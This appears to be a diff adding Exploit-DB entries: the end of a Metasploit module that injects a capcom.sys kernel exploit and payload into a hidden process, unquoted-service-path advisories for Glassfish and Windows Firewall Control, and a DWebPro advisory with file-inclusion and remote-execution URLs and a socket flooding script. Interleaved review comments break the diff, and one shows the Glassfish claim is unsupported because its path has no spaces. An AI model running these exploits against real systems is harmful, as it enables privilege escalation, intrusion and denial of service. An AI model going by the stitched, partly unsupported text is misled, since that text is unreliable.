+ if check_result == Exploit::CheckCode::Safe || check_result == Exploit::CheckCode::Unknown
+ fail_with(Failure::NotVulnerable, 'Exploit not available on this system.')
+ end
+
+ if sysinfo['Architecture'] =~ /wow64/i
+ fail_with(Failure::NoTarget, 'Running against WOW64 is not supported, please get an x64 session')
+ elsif sysinfo['Architecture'] =~ /x64/ && target.arch.first == ARCH_X86
+ fail_with(Failure::NoTarget, 'Session host is x64, but the target is specified as x86')
+ end
+
+ print_status('Launching notepad to host the exploit...')
+ notepad_process = client.sys.process.execute('notepad.exe', nil, {'Hidden' => true})
+ begin
+ process = client.sys.process.open(notepad_process.pid, PROCESS_ALL_ACCESS)
+ print_good("Process #{process.pid} launched.")
+ rescue Rex::Post::Meterpreter::RequestError
+ # Reader Sandbox won't allow to create a new process:
+ # stdapi_sys_process_execute: Operation failed: Access is denied.
+ print_status('Operation failed. Trying to elevate the current process...')
+ process = client.sys.process.open
+ end
+
+ print_status("Reflectively injecting the exploit DLL into #{process.pid}...")
+
+ library_path = ::File.join(Msf::Config.data_directory, 'exploits', 'capcom_sys_exec',
+ 'capcom_sys_exec.x64.dll')
+ library_path = ::File.expand_path(library_path)
+
+ print_status("Injecting exploit into #{process.pid}...")
+ exploit_mem, offset = inject_dll_into_process(process, library_path)
+
+ print_status("Exploit injected. Injecting payload into #{process.pid}...")
+ payload_mem = inject_into_process(process, payload.encoded)
+
+ # invoke the exploit, passing in the address of the payload that
+ # we want invoked on successful exploitation.
+ print_status('Payload injected. Executing exploit...')
+ process.thread.create(exploit_mem + offset, payload_mem)
+
+ print_good('Exploit finished, wait for (hopefully privileged) payload execution to complete.')
+ end
+
+end
\ No newline at end of file
diff --git a/platforms/windows/local/40438.txt b/platforms/windows/local/40438.txt
new file mode 100755
index 000000000..1605b3ca8
--- /dev/null
+++ b/platforms/windows/local/40438.txt
@@ -0,0 +1,36 @@
+# Title: Glassfish Server - Unquoted Service Path Privilege Escalation
+# Date: 28/09/2016
+# Author: s0nk3y
+# Software link: https://glassfish.java.net/download.html
+# Tested: Windows Server 2008 r2 (Metasploitable3)
+
+1. Description
+
+Glassfish Server a service with an unquoted service path running with
+SYSTEM privileges.
+This could potentially allow an authorized but non-privileged local
+user to execute arbitrary code with elevated privileges on the system.
+
+2. Proof
+
+C:\vagrant>sc qc domain1
+[SC] QueryServiceConfig SUCCESS
+
+SERVICE_NAME: domain1
+ TYPE : 10 WIN32_OWN_PROCESS
+ START_TYPE : 2 AUTO_START
+ ERROR_CONTROL : 1 NORMAL
+ BINARY_PATH_NAME : C:\glassfish\glassfish4\glassfish\domains\domain1\bin\domain1Service.exe
+ LOAD_ORDER_GROUP :
+ TAG : 0
+ DISPLAY_NAME : domain1 GlassFish Server
+ DEPENDENCIES : tcpip
+ SERVICE_START_NAME : LocalSystem
+
+3. Exploit:
+
+A successful attempt would require the local user to be able to insert their
+code in the system path undetected by the OS or other security applications
+where it could potentially be executed during application startup or reboot.
+If successful, the local user's code would execute with the elevated privileges
+of the application.
diff --git a/platforms/windows/local/40443.txt b/platforms/windows/local/40443.txt
new file mode 100755
index 000000000..bc15dfede
--- /dev/null
+++ b/platforms/windows/local/40443.txt
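Review bot: `check` assigns `arch = ARCH_X86_64` and never reads it, so the `if … else … end` around it can be reduced to the guard `return Exploit::CheckCode::Safe unless sysinfo['Architecture'] =~ /(wow|x)64/i`. The target label `'Windows x64 (<= 8)'` also disagrees with the code: `check` returns `Unknown` for anything not matching `/windows 7/i`, `exploit` aborts on `Unknown`, and the description says only Windows 7 x64 was tested, so the label should be narrowed to what the module actually accepts or the description should say the <= 8 claim is untested. The `# TODO: check for the capcom.sys driver and its version.` comment sits right after the `file_exist?` check that already covers the driver's presence; rewording it to `# TODO: check the capcom.sys driver version.` keeps it from reading as unfinished.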
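Review bot: The evidence in section 2 does not support the stated weakness: the `BINARY_PATH_NAME` shown, `C:\glassfish\glassfish4\glassfish\domains\domain1\bin\domain1Service.exe`, contains no spaces, and an unquoted service path is only ambiguous to the service control manager when a directory along it contains a space. Unless the real install path had a space that the listing lost, this is not an unquoted-service-path condition, and the entry should either show the spaced path or be reclassified as a permissions finding on the install directory — which the text also never establishes, since section 3 assumes a non-privileged user can write to a path component without showing the directory ACLs. The first sentence of section 1 is missing its verb: `Glassfish Server a service with` needs, for instance, `runs a service with`.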
@@ -0,0 +1,27 @@
+# Exploit Title: Windows Firewall Control Unquoted Service Path Privilege Escalation
+# Date: 24/09/2016
+# Exploit Author: zaeek@protonmail.com
+# Vendor Homepage: http://www.binisoft.org
+# Version: 4.8.6.0
+# Tested on: Windows 7 32/64bit
+
+====Description====
+
+Windows Firewall Control lacks of the quotes in filepath, causing it to be a potential vector of privilege escalation attack.
+To properly exploit this vulnerability, the local attacker must insert an executable file in the path of the service. Upon service restart or system reboot, the malicious code will be run with elevated privileges.
+
+====Proof-of-Concept====
+
+C:\\Users\\testusr>sc qc _wfcs
+[SC] QueryServiceConfig SUCCESS
+
+SERVICE_NAME: _wfcs
+TYPE : 10 WIN32_OWN_PROCESS
+START_TYPE : 2 AUTO_START
+ERROR_CONTROL : 1 NORMAL
+BINARY_PATH_NAME : C:\\Program Files\\Windows Firewall Control\\wfcs.exe
+LOAD_ORDER_GROUP :
+TAG : 0
+DISPLAY_NAME : Windows Firewall Control
+DEPENDENCIES : MpsSvc
+SERVICE_START_NAME : LocalSystem
\ No newline at end of file
diff --git a/platforms/windows/remote/40445.txt b/platforms/windows/remote/40445.txt
new file mode 100755
index 000000000..57e7d5f36
--- /dev/null
+++ b/platforms/windows/remote/40445.txt
@@ -0,0 +1,53 @@
+# Exploit Title: DWebPro 8.4.2 Remote Binary Execution
+# Date: 01/10/2016
+# Exploit Author: Tulpa
+# Contact: tulpa@tulpa-security.com
+# Author website: www.tulpa-security.com
+# Author twitter: @tulpa_security
+# Vendor Homepage: http://www.dwebpro.com/
+# Software Link: http://www.dwebpro.com/download
+# Version: 8.4.2
+# Tested on: Windows 7 x86
+# Shout-out to carbonated and ozzie_offsec
+
+1. Description:
+
+DWebPro is a software package used for used for distributing dynamical web sites on CD/DVD or USB drives. It
+includes it's own web server called "primary web server" as well as an SMTP server. The POC below relates to the
+installation of DWebPro itself however it is conceivable that the vulnerability could be leveraged within certain
+contexts from a CD/DVD or USB drive. Dependent on the client configuration this vulnerability could be exploited
+remotely and/or locally. The SMTP server of DWebPro is also extremely susceptible to DOS attacks.
+
+2. Remote Binary Execution and Local File Inclusion Proof of Concept
+
+When browsing to the demo site installed with DWebPro you will find hyperlinks to various resources located on the
+local machine. One such example is "http://127.0.0.1:8080/dwebpro/start?file=C:\DWebPro\deploy\..\help\english
+\dwebpro.chm". Any file can be accessed on the vulnerable machine by simply replacing the start?file= location. It
+is important to note however that when browsing to an executable file through this vulnerability, that the web server
+will indeed run the application locally instead of prompting you for a download. As an example, the following will start the
+calculator process on the victim machine "http://192.168.0.1:8080/dwebpro/start?file=C:\Windows\system32\calc.exe".
+Calc.exe will by default execute with the same permission as the user who ran dwepro.exe initially.
+
+Basic cmd commands can also be executed such as with "http://192.168.0.1:8080/dwebpro/start?file=ipconfig".
+
+These privileges can be escalated to SYSTEM however by installing the application as a windows service which will
+automatically run on start up. In order to initiate that installation, the attacker could take advantage of a script
+which is installed by default and can be executed thanks to the LFI vulnerability. This can be accomplished by using
+"http://192.168.0.1:8080/dwebpro/start?file=C:\DWebPro\service\install.bat".
+
+3. Denial of Service Proof of Concept
+
+#!/usr/bin/python
+
+import socket
+import sys
+
+s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
+connect=s.connect(('192.168.0.1',25))
+
+evil = 'A' * 300
+s.recv(1024)
+s.send(evil)
+
+s.close()
+